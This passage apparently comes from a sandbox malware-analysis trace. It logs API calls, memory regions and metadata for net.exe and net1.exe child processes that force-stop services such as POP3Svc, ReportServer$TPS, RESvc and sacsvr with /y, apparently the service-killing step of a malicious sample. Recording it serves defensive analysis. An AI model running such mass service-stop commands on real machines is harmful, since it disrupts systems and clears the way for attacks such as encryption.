lpMode=0x26f8d8) returned 1 [0108.291] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff5c1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x26f8d0, lpReserved=0x0 | out: lpBuffer=0xff5c1efc*, lpNumberOfCharsWritten=0x26f8d0*=0x2) returned 1 [0108.291] _ultow (in: _Dest=0x889, _Radix=2554176 | out: _Dest=0x889) returned="2185" [0108.291] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff5e5b50, nSize=0x800, Arguments=0xff5e7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0108.292] GetFileType (hFile=0xb) returned 0x2 [0108.292] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x26f8d8 | out: lpMode=0x26f8d8) returned 1 [0108.292] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff5e5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x26f8d0, lpReserved=0x0 | out: lpBuffer=0xff5e5b50*, lpNumberOfCharsWritten=0x26f8d0*=0x34) returned 1 [0108.292] GetFileType (hFile=0xb) returned 0x2 [0108.292] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x26f8d8 | out: lpMode=0x26f8d8) returned 1 [0108.292] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff5c1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x26f8d0, lpReserved=0x0 | out: lpBuffer=0xff5c1efc*, lpNumberOfCharsWritten=0x26f8d0*=0x2) returned 1 [0108.293] NetApiBufferFree (Buffer=0x3a4d40) returned 0x0 [0108.293] NetApiBufferFree (Buffer=0x3ac0e0) returned 0x0 [0108.293] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop POP3Svc /y" [0108.293] exit (_Code=2) Process: id = "242" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x5db12000" os_pid = "0xcb4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "238" os_parent_pid = "0x1290" cmd_line = "C:\\Windows\\system32\\net1 stop ReportServer$TPS /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9220 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 9221 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 9222 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 9223 start_va = 0x210000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 9224 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9225 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 9226 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9227 start_va = 0xff5c0000 end_va = 0xff5f2fff entry_point = 0xff5c0000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 9228 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 9229 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 9230 start_va = 0x7fffffdb000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 9231 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 9232 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 9233 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 9234 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 9235 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 9236 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 9237 start_va = 0x190000 end_va = 0x1f6fff entry_point = 0x190000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 9238 start_va = 0x300000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 9239 start_va = 0x310000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 9240 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 9241 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 9242 start_va = 0x7fef46a0000 end_va = 0x7fef46b1fff entry_point = 0x7fef46a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 9243 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 9244 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 9245 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 9246 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 9247 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 9248 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 9249 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 9250 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 9251 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 9252 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 9253 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 9254 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 9255 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 9256 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 9257 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 9298 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 713 os_tid = 0xce0 [0108.223] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28f7b0 | out: lpSystemTimeAsFileTime=0x28f7b0*(dwLowDateTime=0xf5a86390, dwHighDateTime=0x1d48689)) [0108.223] GetCurrentProcessId () returned 0xcb4 [0108.223] GetCurrentThreadId () returned 0xce0 [0108.223] GetTickCount () returned 0x24c89 [0108.223] QueryPerformanceCounter (in: lpPerformanceCount=0x28f7b8 | out: lpPerformanceCount=0x28f7b8*=1815514100000) returned 1 [0108.224] GetModuleHandleW (lpModuleName=0x0) returned 0xff5c0000 [0108.224] __set_app_type (_Type=0x1) [0108.224] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff5d9c9c) returned 0x0 [0108.225] __getmainargs (in: _Argc=0xff5e4780, _Argv=0xff5e4790, _Env=0xff5e4788, _DoWildCard=0, _StartInfo=0xff5e479c | out: _Argc=0xff5e4780, _Argv=0xff5e4790, _Env=0xff5e4788) returned 0 [0108.225] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0108.225] GetConsoleOutputCP () returned 0x1b5 [0108.225] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff5ecec0 | out: lpCPInfo=0xff5ecec0) returned 1 [0108.225] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0108.227] sprintf_s (in: _DstBuf=0x28f758, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0108.227] setlocale (category=0, locale=".437") returned="English_United States.437" [0108.228] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0108.228] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0108.228] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ReportServer$TPS /y" [0108.228] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x28f4f0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0108.228] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0108.228] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x28f748 | out: Buffer=0x28f748*=0xa4d50) returned 0x0 [0108.228] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x28f748 | out: Buffer=0x28f748*=0xac100) returned 0x0 [0108.228] _fileno (_File=0x7fefdba2a80) returned 0 [0108.228] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0108.229] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0108.229] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0108.229] _wcsicmp (_String1="config", _String2="stop") returned -16 [0108.229] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0108.229] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0108.229] _wcsicmp (_String1="file", _String2="stop") returned -13 [0108.229] _wcsicmp (_String1="files", _String2="stop") returned -13 [0108.229] _wcsicmp (_String1="group", _String2="stop") returned -12 [0108.229] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0108.229] _wcsicmp (_String1="help", _String2="stop") returned -11 [0108.229] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0108.229] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0108.229] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0108.229] _wcsicmp (_String1="session", _String2="stop") returned -15 [0108.229] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0108.229] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0108.229] _wcsicmp (_String1="share", _String2="stop") returned -12 [0108.229] _wcsicmp (_String1="start", _String2="stop") returned -14 [0108.229] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0108.229] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0108.229] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0108.229] _wcsicmp (_String1="accounts", _String2="ReportServer$TPS") returned -17 [0108.229] _wcsicmp (_String1="computer", _String2="ReportServer$TPS") returned -15 [0108.229] _wcsicmp (_String1="config", _String2="ReportServer$TPS") returned -15 [0108.229] _wcsicmp (_String1="continue", _String2="ReportServer$TPS") returned -15 [0108.229] _wcsicmp (_String1="cont", _String2="ReportServer$TPS") returned -15 [0108.229] _wcsicmp (_String1="file", _String2="ReportServer$TPS") returned -12 [0108.229] _wcsicmp (_String1="files", _String2="ReportServer$TPS") returned -12 [0108.229] _wcsicmp (_String1="group", _String2="ReportServer$TPS") returned -11 [0108.229] _wcsicmp (_String1="groups", _String2="ReportServer$TPS") returned -11 [0108.229] _wcsicmp (_String1="help", _String2="ReportServer$TPS") returned -10 [0108.229] _wcsicmp (_String1="helpmsg", _String2="ReportServer$TPS") returned -10 [0108.229] _wcsicmp (_String1="localgroup", _String2="ReportServer$TPS") returned -6 [0108.229] _wcsicmp (_String1="pause", _String2="ReportServer$TPS") returned -2 [0108.229] _wcsicmp (_String1="session", _String2="ReportServer$TPS") returned 1 [0108.229] _wcsicmp (_String1="sessions", _String2="ReportServer$TPS") returned 1 [0108.230] _wcsicmp (_String1="sess", _String2="ReportServer$TPS") returned 1 [0108.230] _wcsicmp (_String1="share", _String2="ReportServer$TPS") returned 1 [0108.230] _wcsicmp (_String1="start", _String2="ReportServer$TPS") returned 1 [0108.230] _wcsicmp (_String1="stats", _String2="ReportServer$TPS") returned 1 [0108.230] _wcsicmp (_String1="statistics", _String2="ReportServer$TPS") returned 1 [0108.230] _wcsicmp (_String1="stop", _String2="ReportServer$TPS") returned 1 [0108.230] _wcsicmp (_String1="time", _String2="ReportServer$TPS") returned 2 [0108.230] _wcsicmp (_String1="user", _String2="ReportServer$TPS") returned 3 [0108.230] _wcsicmp (_String1="users", _String2="ReportServer$TPS") returned 3 [0108.230] _wcsicmp (_String1="msg", _String2="ReportServer$TPS") returned -5 [0108.230] _wcsicmp (_String1="messenger", _String2="ReportServer$TPS") returned -5 [0108.230] _wcsicmp (_String1="receiver", _String2="ReportServer$TPS") returned -13 [0108.230] _wcsicmp (_String1="rcv", _String2="ReportServer$TPS") returned -2 [0108.230] _wcsicmp (_String1="netpopup", _String2="ReportServer$TPS") returned -4 [0108.230] _wcsicmp (_String1="redirector", _String2="ReportServer$TPS") returned -12 [0108.230] _wcsicmp (_String1="redir", _String2="ReportServer$TPS") returned -12 [0108.230] _wcsicmp (_String1="rdr", _String2="ReportServer$TPS") returned -1 [0108.230] _wcsicmp (_String1="workstation", _String2="ReportServer$TPS") returned 5 [0108.230] _wcsicmp (_String1="work", _String2="ReportServer$TPS") returned 5 [0108.230] _wcsicmp (_String1="wksta", _String2="ReportServer$TPS") returned 5 [0108.230] _wcsicmp (_String1="prdr", _String2="ReportServer$TPS") returned -2 [0108.230] _wcsicmp (_String1="devrdr", _String2="ReportServer$TPS") returned -14 [0108.230] _wcsicmp (_String1="lanmanworkstation", _String2="ReportServer$TPS") returned -6 [0108.230] _wcsicmp (_String1="server", _String2="ReportServer$TPS") returned 1 [0108.230] _wcsicmp (_String1="svr", _String2="ReportServer$TPS") returned 1 [0108.230] _wcsicmp (_String1="srv", _String2="ReportServer$TPS") returned 1 [0108.230] _wcsicmp (_String1="lanmanserver", _String2="ReportServer$TPS") returned -6 [0108.230] _wcsicmp (_String1="alerter", _String2="ReportServer$TPS") returned -17 [0108.230] _wcsicmp (_String1="netlogon", _String2="ReportServer$TPS") returned -4 [0108.230] _wcsupr (in: _String="ReportServer$TPS" | out: _String="REPORTSERVER$TPS") returned="REPORTSERVER$TPS" [0108.231] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0xace10 [0108.296] GetServiceKeyNameW (in: hSCManager=0xace10, lpDisplayName="REPORTSERVER$TPS", lpServiceName=0xff5e5750, lpcchBuffer=0x28f668 | out: lpServiceName="", lpcchBuffer=0x28f668) returned 0 [0108.297] _wcsicmp (_String1="msg", _String2="REPORTSERVER$TPS") returned -5 [0108.297] _wcsicmp (_String1="messenger", _String2="REPORTSERVER$TPS") returned -5 [0108.297] _wcsicmp (_String1="receiver", _String2="REPORTSERVER$TPS") returned -13 [0108.297] _wcsicmp (_String1="rcv", _String2="REPORTSERVER$TPS") returned -2 [0108.297] _wcsicmp (_String1="redirector", _String2="REPORTSERVER$TPS") returned -12 [0108.297] _wcsicmp (_String1="redir", _String2="REPORTSERVER$TPS") returned -12 [0108.297] _wcsicmp (_String1="rdr", _String2="REPORTSERVER$TPS") returned -1 [0108.297] _wcsicmp (_String1="workstation", _String2="REPORTSERVER$TPS") returned 5 [0108.297] _wcsicmp (_String1="work", _String2="REPORTSERVER$TPS") returned 5 [0108.297] _wcsicmp (_String1="wksta", _String2="REPORTSERVER$TPS") returned 5 [0108.297] _wcsicmp (_String1="prdr", _String2="REPORTSERVER$TPS") returned -2 [0108.297] _wcsicmp (_String1="devrdr", _String2="REPORTSERVER$TPS") returned -14 [0108.297] _wcsicmp (_String1="lanmanworkstation", _String2="REPORTSERVER$TPS") returned -6 [0108.297] _wcsicmp (_String1="server", _String2="REPORTSERVER$TPS") returned 1 [0108.297] _wcsicmp (_String1="svr", _String2="REPORTSERVER$TPS") returned 1 [0108.297] _wcsicmp (_String1="srv", _String2="REPORTSERVER$TPS") returned 1 [0108.297] _wcsicmp (_String1="lanmanserver", _String2="REPORTSERVER$TPS") returned -6 [0108.297] _wcsicmp (_String1="alerter", _String2="REPORTSERVER$TPS") returned -17 [0108.297] _wcsicmp (_String1="netlogon", _String2="REPORTSERVER$TPS") returned -4 [0108.297] NetServiceControl (in: servername=0x0, service="REPORTSERVER$TPS", opcode=0x0, arg=0x0, bufptr=0x28f670 | out: bufptr=0x28f670) returned 0x889 [0108.298] wcscpy_s (in: _Destination=0xff5e80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0108.298] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0108.299] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff5e5b50, nSize=0x800, Arguments=0xff5e7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0108.300] GetFileType (hFile=0xb) returned 0x2 [0108.300] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x28f538 | out: lpMode=0x28f538) returned 1 [0108.300] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff5e5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x28f530, lpReserved=0x0 | out: lpBuffer=0xff5e5b50*, lpNumberOfCharsWritten=0x28f530*=0x1e) returned 1 [0108.300] GetFileType (hFile=0xb) returned 0x2 [0108.300] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x28f538 | out: lpMode=0x28f538) returned 1 [0108.301] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff5c1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f530, lpReserved=0x0 | out: lpBuffer=0xff5c1efc*, lpNumberOfCharsWritten=0x28f530*=0x2) returned 1 [0108.301] _ultow (in: _Dest=0x889, _Radix=2684320 | out: _Dest=0x889) returned="2185" [0108.301] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff5e5b50, nSize=0x800, Arguments=0xff5e7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0108.301] GetFileType (hFile=0xb) returned 0x2 [0108.301] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x28f538 | out: lpMode=0x28f538) returned 1 [0108.302] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff5e5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x28f530, lpReserved=0x0 | out: lpBuffer=0xff5e5b50*, lpNumberOfCharsWritten=0x28f530*=0x34) returned 1 [0108.302] GetFileType (hFile=0xb) returned 0x2 [0108.302] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x28f538 | out: lpMode=0x28f538) returned 1 [0108.302] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff5c1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f530, lpReserved=0x0 | out: lpBuffer=0xff5c1efc*, lpNumberOfCharsWritten=0x28f530*=0x2) returned 1 [0108.303] NetApiBufferFree (Buffer=0xa4d50) returned 0x0 [0108.303] NetApiBufferFree (Buffer=0xac100) returned 0x0 [0108.303] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ReportServer$TPS /y" [0108.303] exit (_Code=2) Process: id = "243" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x5f5e2000" os_pid = "0xc98" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop RESvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9258 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 9259 start_va = 0x30000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 9260 start_va = 0xb0000 end_va = 0xb3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000b0000" filename = "" Region: id = 9261 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 9262 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9263 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 9264 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9265 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 9266 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 9267 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 9268 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 9269 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 9270 start_va = 0x180000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 9271 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 9272 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 714 os_tid = 0xcfc Process: id = "244" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x51d07000" os_pid = "0xd40" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop sacsvr /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9299 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 9300 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 9301 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 9302 start_va = 0x110000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 9303 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9304 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 9305 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9306 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 9307 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 9308 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 9309 start_va = 0x7fffffd5000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 9310 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename 